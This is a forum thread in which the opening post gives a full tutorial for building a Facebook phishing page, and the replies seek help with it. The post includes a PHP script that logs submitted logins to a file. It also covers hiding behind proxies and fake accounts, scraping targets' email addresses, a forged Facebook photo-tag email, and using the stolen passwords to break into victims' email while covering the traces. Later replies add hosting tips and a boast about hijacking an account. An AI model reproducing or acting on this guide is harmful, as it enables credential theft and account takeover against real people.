Zoklet.net

Go Back   Zoklet.net > Technology > Technophiles and Technophiliacs

Reply
 
Thread Tools
  #1  
Old 03-07-2010, 07:37 AM
grayboy grayboy is offline
Regular
 
Join Date: Jan 2009
Thanks: 0
Thanked 5 Times in 4 Posts
Default How to phish(tutorial inside)

How to-make a phishing page by Grayboy 

What is a phishing page?
A phishing page is a fake login page, for example a fake facebook login. Instead of logging you into facebook, it keeps the password!


Preparation work

A journey of a thousand miles starts with a first step, here is yours. This needs to be organised, so create a folder on your pc called “phishing”. Then right click inside it and go to new, then new notepad document. Make two of these. Then go onto tools>folder options>view. Scroll right down and make sure the box that says “hide extensions for known file types” is not ticked.
Now you are ready to begin.

Step one-choose your target.

To phish, you need a website to phish. The only rule is it has to have a login. Social networking sites are the most common, full to the brim with retarded teenagers as well so it is target rich, and half of them have the same password on there as there hotmail. Your choice however, for the sakes of this run through lets do facebook.

Step two-make the index page.

This is like the home page of the phishing site, which the target will see. We need to make it exactly like facebook, tricky right? Nope, just copy their code! To do this go onto www.facebook.com, right click in the white spaces and go to “view page source”. When it opens up press “CTRL+A”, then “CTRL+C” to copy the code to your ciipboard.

Ok now open up one of your notepad documents. Copy it all in. Press “CTRL+F” and type action into the bar that comes up. Next to “action” is a website address in some parenthesis. Take out the address but not the parenthesis, and replace it with “post.php” . Now save this as “index.htm, thus making it into a webpage that bears a striking resemblance to facebook.

Step three-make the php file.
This is the form that handles the fake login. It will send the reader to facebook after they have logged in like they have typed the wrong password. Plus it will create a text file with the password in it which will be called username.txt

Copy this code into the second notepad document;
<?php
header ('Location: www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Remember, where it says facebook, it can be changed to any site.

Save this as “post.php”.

Step 4-hitting the World Wide Web!

Whilst this is all well and good, it won’t do anything sat on your computer! It need to be uploaded.
Remember phishing is illegal, and even though it is very laxly enforced, it still makes sense not to have your ip (internet protocol) address linked to it as it can be tracked back to you. So go on www.proxy.org and choose one of the many proxies linked.
Test it, see if it is fast. If it is use it go to http://www.ripway.com/.
Also open a temporary email account on www.10minutemail.com , use this to provide an email address.
Get your username as close to facebook as possible, and give a fake name and address.
Then go to filemanager, delete the index.htm that is already there. Now upload your own index.htm and post.php.
Ok now time to test it ,type in a random username and password, let the form go through. Then go back to your file manager and a new file called usernames.txt should be there. Click it and, as if by magic the username and password you provided will be there!

Step 5-Getting it out their!

Okay now for this you are going to need a fake email. Again use proxies and fake names to create it. The fake name should be “facebook” so that’s what the targets see when your email comes through. Something like facebook_admin@live.co.uk should be ok.

You need people to send it to. If you know any particular people you want to phish do them, but I am assuming you like everyone you know pretty much and need randomers. If that is the case google is our friend!

Go on google and type in site:www.facebook.com:”@hotmail.com” .This should give you lots of targets. Copy these using this -http://www.surf7.net/services/value-added-services/free-web-tools/email-extractor-lite/

Now you need to get the actual content sorted. I recommend using a real email from the site and personalising it. For example;

Rosanna (Any girls name will do xd) tagged 5 photos of you in the album "AWESOME tymes xx".

To see the photos, follow the link below:
Your link here with a load of random stuff afterwards to bulk it out. For example I would usehttp://randomusername123abcgh.110mb.com/ ,except yours will sound a lot more realistic xd 
Thanks,
The Facebook Team

___
Find people from your Windows Live Hotmail address book on Facebook! Go to:http://www.facebook.com/find-friends/?ref=email

Do you want to control which emails you receive from Facebook? Go to:
http://www.facebook.com/editaccount....Y1NzY0MDQzMg==
Facebook's offices are located at 1601 S. California Ave., Palo Alto, CA 94304.
So send all these emails out and hope for the best, remember it is a luck thing xd, a law of averages dictates you will get like 30% maybe, so send loads out 

Step 6-Using the passwords

Again use a proxy to access them. Now you might be bored and just want to deface some facebooks or whatever, and that’s fine. However I would trying the password with there hotmail/email address seriously recommend  .If you get into a hotmail use a proxy, do all the password reminders you can, and remember to double delete (delete from delete folder as well) any reminders or resets you use . Also any email you read you should mark as unread afterwards , just to be on the safe side 

Okay, thanks for reading, and remember this is all educational
Reply With Quote
The following users say "It is so good to hear it!":
DrGoogfan (03-07-2010), Rainycity (03-07-2010)
  #2  
Old 03-07-2010, 08:37 AM
Rainycity's Avatar
Rainycity Rainycity is offline
Grander Duke
 
Join Date: Jan 2009
Location: My fort made out of blankets.
Thanks: 1,478
Thanked 1,016 Times in 723 Posts
Default Re: How to phish(tutorial inside)

They terminated my account as soon as i uploaded the file, what shall i do now o great one.
__________________
Known Snitches Zok jr & Communicate. Number one Phaggit award goes to.... [B]Schplew[/B] Congrats on being the biggest and baddest phaggit on zoklet, YOU EARNED IT!!
Reply With Quote
  #3  
Old 03-07-2010, 05:42 PM
grayboy grayboy is offline
Regular
 
Join Date: Jan 2009
Thanks: 0
Thanked 5 Times in 4 Posts
Default Re: How to phish(tutorial inside)

Quote:
Originally Posted by Rainycity View Post
They terminated my account as soon as i uploaded the file, what shall i do now o great one.
Try 110mb xd
Reply With Quote
  #4  
Old 03-07-2010, 07:27 PM
BoxxyBabe BoxxyBabe is offline
Peasant
 
Join Date: Aug 2009
Thanks: 0
Thanked 4 Times in 3 Posts
Arrow Re: How to phish(tutorial inside)

Quote:
Originally Posted by grayboy View Post
How to-make a phishing page by Grayboy 

Step 6-Using the passwords

Again use a proxy to access them. Now you might be bored and just want to deface some facebooks or whatever, and that’s fine. However I would trying the password with there hotmail/email address seriously recommend  .If you get into a hotmail use a proxy, do all the password reminders you can, and remember to double delete (delete from delete folder as well) any reminders or resets you use . Also any email you read you should mark as unread afterwards , just to be on the safe side 

Okay, thanks for reading, and remember this is all educational
What the fuck are you talking about? Using a proxy to get into their password? If you're going to change someones password, you don't need a proxy or need to hide behind one.
__________________
Like a Gatorade Bottle.
Reply With Quote
  #5  
Old 03-07-2010, 09:49 PM
grayboy grayboy is offline
Regular
 
Join Date: Jan 2009
Thanks: 0
Thanked 5 Times in 4 Posts
Default Re: How to phish(tutorial inside)

Quote:
Originally Posted by Technique View Post
What the fuck are you talking about? Using a proxy to get into their password? If you're going to change someones password, you don't need a proxy or need to hide behind one.
Remember the kid who changed Sarah Palins email? He got caught , so your better off playing it safe because the technology does exist to track you down.
Reply With Quote
  #6  
Old 03-07-2010, 10:13 PM
The Cheshire Cat The Cheshire Cat is offline
Tech Dude
 
Join Date: Jan 2009
Location: Everywhere
Thanks: 530
Thanked 1,092 Times in 686 Posts
Send a message via MSN to The Cheshire Cat
Arrow Re: How to phish(tutorial inside)

Quote:
Originally Posted by grayboy View Post
Remember the kid who changed Sarah Palins email? He got caught , so your better off playing it safe because the technology does exist to track you down.
They don't give a fuck about some 16 year old that got their facebook jacked. They only cared about Palin because she a politician.
__________________
Quote:
Originally Posted by -SpectraL View Post
Some people just like to be argumentative about stuff nobody should really give a fuck about.
Reply With Quote
  #7  
Old 03-07-2010, 10:20 PM
grayboy grayboy is offline
Regular
 
Join Date: Jan 2009
Thanks: 0
Thanked 5 Times in 4 Posts
Talking Re: How to phish(tutorial inside)

Quote:
Originally Posted by The Cheshire Cat View Post
They don't give a fuck about some 16 year old that got their facebook jacked. They only cared about Palin because she a politician.
Unless said 16 year old calls cops and they are obliged to act, unlikely but this one time when I was younger I hacked this dickheads hotmail, was so annoyed I pissed off all his mates on facebook and msn and they were over at my house threatening to call cops. I had to fight him and his big ass older brother as well man...
Ever since then I have being a safety first kind of guy...still like a year later his car got shopped, his tyres slit and a brick through his window..isn't it funny how karma works

Last edited by grayboy; 03-07-2010 at 10:24 PM.
Reply With Quote
The following users say "It is so good to hear it!":
Rainycity (01-22-2012)
  #8  
Old 04-09-2010, 12:49 PM
zecklips zecklips is offline
Peasant
 
Join Date: Jan 2009
Location: inside your network
Thanks: 5
Thanked 2 Times in 2 Posts
Default Re: How to phish(tutorial inside)

well put. Wouldnt you wanna make it have some sort of e-mail sender tho? like send it to some one saying they have unread mail on thier account thus guiding them to your "creation" causeing them to log for you?
__________________
RIP Totse May 24, 1989---January 17, 2009
Reply With Quote
  #9  
Old 01-22-2012, 03:18 PM
cookiemonster123 cookiemonster123 is offline
Mud Farmer
 
Join Date: Dec 2011
Thanks: 0
Thanked 0 Times in 0 Posts
Default Re: How to phish(tutorial inside)

my internet wont let me use proxy, is it ok if i just dont do it....?
Reply With Quote
  #10  
Old 01-23-2012, 05:20 PM
The Cheshire Cat The Cheshire Cat is offline
Tech Dude
 
Join Date: Jan 2009
Location: Everywhere
Thanks: 530
Thanked 1,092 Times in 686 Posts
Send a message via MSN to The Cheshire Cat
Arrow Re: How to phish(tutorial inside)

What do you mean your 'internet' wont let you use a proxy? That just doesn't make any sense.
__________________
Quote:
Originally Posted by -SpectraL View Post
Some people just like to be argumentative about stuff nobody should really give a fuck about.
Reply With Quote
  #11  
Old 01-25-2012, 10:31 AM
cookiemonster123 cookiemonster123 is offline
Mud Farmer
 
Join Date: Dec 2011
Thanks: 0
Thanked 0 Times in 0 Posts
Default Re: How to phish(tutorial inside)

its blocked.. :/
Reply With Quote
  #12  
Old 01-25-2012, 10:39 AM
cookiemonster123 cookiemonster123 is offline
Mud Farmer
 
Join Date: Dec 2011
Thanks: 0
Thanked 0 Times in 0 Posts
Default Re: How to phish(tutorial inside)

i also dont understand step 4. is file manager on a website or in the computer
sorry im such a noob
Reply With Quote
  #13  
Old 01-29-2012, 05:27 PM
iMagiNation iMagiNation is offline
iLumminati Puppt in a box
 
Join Date: Aug 2010
Thanks: 2,931
Thanked 3,284 Times in 2,270 Posts
Default Re: How to phish(tutorial inside)

Quote:
Originally Posted by cookiemonster123 View Post
its blocked.. :/
what are you trying to do this from a school computer? that's smart...
Reply With Quote
  #14  
Old 01-10-2013, 04:34 AM
JakeC08 JakeC08 is offline
Mud Farmer
 
Join Date: Jan 2013
Thanks: 0
Thanked 0 Times in 0 Posts
Default Re: How to phish(tutorial inside)

hi mate, excellent tutorial only i am stuck on a couple of things....
1, you know were you say take out the address next to action but not the parenthesis, well were does the address end that i am to take out and replace with post.php ?
2, ripway doesnt seem to work - it just goes to a search engine :/ ?
3,ya know this - Then go to filemanager, delete the index.htm that is already there. do you mean on my pc ???

Thanks mate and keep up the great work
Reply With Quote
  #15  
Old 01-14-2013, 09:40 AM
Ironclad's Avatar
Ironclad Ironclad is offline
Baron
 
Join Date: Oct 2012
Location: Underground...
Thanks: 218
Thanked 223 Times in 180 Posts
Default Re: How to phish(tutorial inside)

Quote:
Originally Posted by grayboy View Post
Unless said 16 year old calls cops and they are obliged to act
Sorry, guy... But you clearly don't realize how local police operate.
They are legally obligated to respond to an actual reported crime. The local police are not going to have the knowledge and technology to track you down, and they certainly aren't hiring a bunch of feds or network analysis professionals to do it for them. The only way this would happen is if it was a huge epidemic in a certain area or all over the network that was connected to a group and feds caught wind of it. I understand you'd rather be safe than sorry, but it's really unnecessary. The cops would not give a fuck. They would show up, legally have to listen to a 16 year old bitch, go back to harassing people who don't deserve it and probably will forget about the 16 year old by the end of the day.

Secondly, this is what you get for posting a phishing tutorial... It attracts n00bs with a ton of questions.

And last, ripway blows. I don't even think it works. This was the preferred method when blackbay.org was a huge deal back in like 2006 probably. Probably best to find a better host other than ripway if you're going to be posting tutorials. Or you could start your own, claim it's an "anonymous file host" and just look the other way/not release info to feds, but then you risk problems with your ISP.
Reply With Quote
Reply

Bookmarks

Tags
inside, phishtutorial

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
PETA asks Phish to change name to Sea Kittens lolocaust This Just In! 46 01-07-2011 02:43 PM
Operation Phish Phry Nets 100 Suspects KillSwitch_J This Just In! 2 10-08-2009 04:48 PM
Phish festival Dream of the iris Bat Country 25 08-24-2009 03:07 AM
ITT: We are not at Phish tonight the new deal Bat Country 0 03-06-2009 09:17 PM
PHISH! colorsoc Music! 0 01-18-2009 08:00 PM


All times are GMT. The time now is 06:15 PM.


Hot Topics
Join our Chatroom!
Users: 8
Messages/minute: 0
Topic: "Only rule: be nice or I'll cut your fucking face off, dumbshit"
Users: 27
Messages/minute: 1.6
Topic: "http://codelove.org :: Below is above in 2 codes 1 love. :: wh..."
Users: 18
Messages/minute: 5
Topic: "http://www.literotica...."
Advertisements
Your ad could go right HERE! Contact us!

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.